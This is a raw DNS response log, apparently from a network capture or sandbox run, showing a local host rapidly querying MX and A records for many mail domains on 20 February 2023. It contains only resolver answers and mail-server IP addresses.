Feb 20, 2023 09:51:41.673574924 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.684565067 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:41.687632084 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.765496016 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:41.785475969 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.795763969 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.843987942 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:41.902633905 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.937182903 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:42.028608084 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.033691883 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.039563894 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.064852953 CET	8.8.8.8	192.168.2.5	0x45b	No error (0)	contoso-com.mail.protection.outlook.com		104.47.57.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:42.064852953 CET	8.8.8.8	192.168.2.5	0x45b	No error (0)	contoso-com.mail.protection.outlook.com		104.47.51.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:42.103827953 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.142581940 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.256741047 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.278348923 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	adatum.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.310874939 CET	8.8.8.8	192.168.2.5	0x7e6e	No error (0)	mail.adatum.com		131.107.88.24	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:42.353302956 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.445522070 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:42.544234991 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.545999050 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.717551947 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.820694923 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.919163942 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.023611069 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.063082933 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.109980106 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	adatum.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.143325090 CET	8.8.8.8	192.168.2.5	0x3a8f	No error (0)	mail.adatum.com		131.107.88.24	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.237247944 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.248415947 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.368380070 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.380309105 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.432002068 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.432002068 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.432002068 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.432002068 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.432002068 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.456670046 CET	8.8.8.8	192.168.2.5	0xead4	No error (0)	aspmx.l.google.com		142.250.27.26	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.509617090 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.599710941 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.791721106 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.es			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.794871092 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		165.227.159.144	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		178.62.199.248	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		5.75.171.74	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		5.161.98.212	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		167.235.143.33	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.812741995 CET	8.8.8.8	192.168.2.5	0xeff9	No error (0)	mail.h-email.net		165.227.156.49	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:44.023159027 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:44.899636030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.116029024 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.209690094 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.313098907 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.321753979 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.322462082 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.484033108 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.492070913 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fabrikam.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.545022964 CET	8.8.8.8	192.168.2.5	0x913a	No error (0)	mail.fabrikam.com		131.107.55.31	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:45.930321932 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	contoso.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.965874910 CET	8.8.8.8	192.168.2.5	0xa46e	No error (0)	contoso-com.mail.protection.outlook.com		104.47.57.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:45.965874910 CET	8.8.8.8	192.168.2.5	0xa46e	No error (0)	contoso-com.mail.protection.outlook.com		104.47.51.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:46.012490988 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.215348959 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	litwareinc.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.244313955 CET	8.8.8.8	192.168.2.5	0x8e1a	No error (0)	smtp.litwareinc.com		96.47.154.206	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:46.625804901 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.761931896 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.963041067 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fabrikam.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.998301983 CET	8.8.8.8	192.168.2.5	0x2729	No error (0)	mail.fabrikam.com		131.107.55.31	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:47.268522024 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	adatum.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:47.294346094 CET	8.8.8.8	192.168.2.5	0x18f7	No error (0)	mail.adatum.com		131.107.88.24	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:47.449218035 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:49.119479895 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:50.420150995 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:50.528606892 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:51.198323011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:52.717082977 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:52.731527090 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.049035072 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.059343100 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.809479952 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.820667028 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:55.035079002 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	vlada.hr			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:55.035079002 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	vlada.hr			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:55.035079002 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	vlada.hr			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:55.105993032 CET	8.8.8.8	192.168.2.5	0x766d	No error (0)	ma-01.vlada.hr		195.29.173.138	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:55.667205095 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:51:56.441643953 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:56.562169075 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:51:56.885015965 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	dva.hr			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:57.011260033 CET	8.8.8.8	192.168.2.5	0x342f	No error (0)	mail.dva.hr		178.218.165.214	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:58.556653976 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:58.780879021 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:51:59.091945887 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:51:59.198041916 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.459338903 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fb.cz			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.459338903 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fb.cz			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.459338903 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fb.cz			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.459338903 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fb.cz			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.459338903 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fb.cz			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.481595993 CET	8.8.8.8	192.168.2.5	0x6229	No error (0)	aspmx.l.google.com		142.250.27.27	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:00.076492071 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.141222954 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.188874960 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:00.257528067 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.337255955 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	abc.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.366581917 CET	8.8.8.8	192.168.2.5	0x26dd	No error (0)	abc-org.mail.protection.outlook.com		104.47.57.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:00.366581917 CET	8.8.8.8	192.168.2.5	0x26dd	No error (0)	abc-org.mail.protection.outlook.com		104.47.56.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:00.438879013 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:52:00.535114050 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:52:01.408648014 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:52:01.647650003 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:52:01.759143114 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.815399885 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.958424091 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.964302063 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.309413910 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:02.329271078 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	orice.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.329271078 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	orice.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.377228022 CET	8.8.8.8	192.168.2.5	0x93c9	No error (0)	mx.leonet.it		212.19.106.223	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:02.377228022 CET	8.8.8.8	192.168.2.5	0x93c9	No error (0)	mx.leonet.it		212.19.106.229	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:02.582439899 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.705749035 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.894155025 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:03.014728069 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:03.112873077 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.40.29	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.5	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.281033993 CET	8.8.8.8	192.168.2.5	0x689	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:03.575809956 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.121889114 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	haxx.se			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.231123924 CET	8.8.8.8	192.168.2.5	0xde3f	No error (0)	silly.haxx.se		159.253.31.95	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:04.691466093 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.781182051 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	adatum.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.807070971 CET	8.8.8.8	192.168.2.5	0x70b7	No error (0)	mail.adatum.com		131.107.88.24	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:04.892699957 CET	8.8.8.8	192.168.2.5	0x8681	No error (0)	adobe-com.mail.protection.outlook.com		104.47.73.10	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:04.892699957 CET	8.8.8.8	192.168.2.5	0x8681	No error (0)	adobe-com.mail.protection.outlook.com		104.47.74.10	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:06.079790115 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.367074966 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.705336094 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fabrikam.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.725514889 CET	8.8.8.8	192.168.2.5	0x75df	No error (0)	mail.fabrikam.com		131.107.55.31	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:07.010390043 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.052930117 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.277086020 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.393548012 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.404441118 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.508146048 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:08.615914106 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:08.624885082 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:52:08.738111973 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.815630913 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.819185972 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:52:08.858380079 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.001920938 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:52:09.027797937 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:52:09.095581055 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:52:09.488239050 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:52:09.498548031 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:52:09.499572039 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.40.29	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.5	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.506381035 CET	8.8.8.8	192.168.2.5	0x7d9a	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.529721022 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	autoitscript.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.563504934 CET	8.8.8.8	192.168.2.5	0x89dd	No error (0)	autoitscript-com.mail.protection.outlook.com		104.47.11.202	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.563504934 CET	8.8.8.8	192.168.2.5	0x89dd	No error (0)	autoitscript-com.mail.protection.outlook.com		104.47.11.74	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.912162066 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:52:09.917278051 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.928314924 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.940112114 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.028203964 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.113413095 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	pobox.com			MX (Mail exchange)	IN (0x0001)	false
